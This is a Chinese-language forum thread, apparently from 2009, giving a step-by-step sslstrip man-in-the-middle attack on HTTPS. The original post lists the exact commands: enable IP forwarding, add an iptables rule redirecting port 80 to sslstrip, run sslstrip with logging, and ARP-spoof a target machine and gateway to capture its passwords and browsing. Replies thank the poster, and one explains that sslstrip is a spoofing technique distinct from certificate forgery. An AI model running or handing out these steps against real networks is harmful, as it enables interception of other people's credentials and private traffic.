无线渗透--从外网到内网系列之中间人攻击外传--拿下HTTPS.
无线渗透--从外网到内网系列之中间人攻击外传--拿下HTTPS.强烈建议不明OpenSSL, MITM attack为何物的朋友,先看无线渗透--从外网到内网系列之中间人攻击(http://forum.anywlan.com/thread-17045-1-1.html),对MITM attack有了一定了解后在读本文. :) 正如杨哲在文中提到进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 在大部份情况下对仅HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了最新OpenSSL版本的就没办法了..... 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.
此软件可在(http://www.thoughtcrime.org/software/sslstrip/index.html)找到. E文ok的朋友还可以看他在Black hat上的精彩演讲. 因sslstrip是用python写成,不用安装也可运行.
用法分为以下几步:
1) 用命令 echo "1" > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.
2) 用命令 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 使iptables把所有http数据导入sslstrip.
3) 运行 sslstrip -a -w ssllog (写入文本)
4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)
接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成. 此文是小弟头一回发贴,有不对之处还请大狭们都指正! :)
Prisoner 一直想知道破解ssl/tls的工具,改天试试:)
谢谢楼主分享。 谢谢分享
~~ 这个是最前沿了。嘿嘿,SSL,灭了!哈哈哈哈!感谢分享! 哈, 不知到实战效果如何. 俺有机会去测试下 ;) 大家也把测试结果发出来吧. :D 呵呵,才看到,不错的文章,记得07年坛子里朋友也问起过对于SSL的攻击及破解,我还在线给他解释过工具及原理。windows下的Cain就具有SSL证书拦截及伪造功能,可以很简单地伪造证书,但是会弹出提示。
而你现在所提及的sslstrip,这个和证书拦截在原理上就是不一样的,Blackhat的报道我看过,这个应该是伪造了SSL小黄锁的图标及预防问页面,严格来说,应该属于钓鱼或者欺骗攻击的一种。而不是正面拦截证书分析及伪造证书的中间人攻击。
哈,感谢楼主的分享和交流,我会在近期跟上一个更详细的教程,来说明。 感谢共享。 It's very great Longas还在等你的下文呢? :D 多谢分享......... no probs :) 谢谢分享
有空去试试!到时一定来发点效果!
页:
[1]
2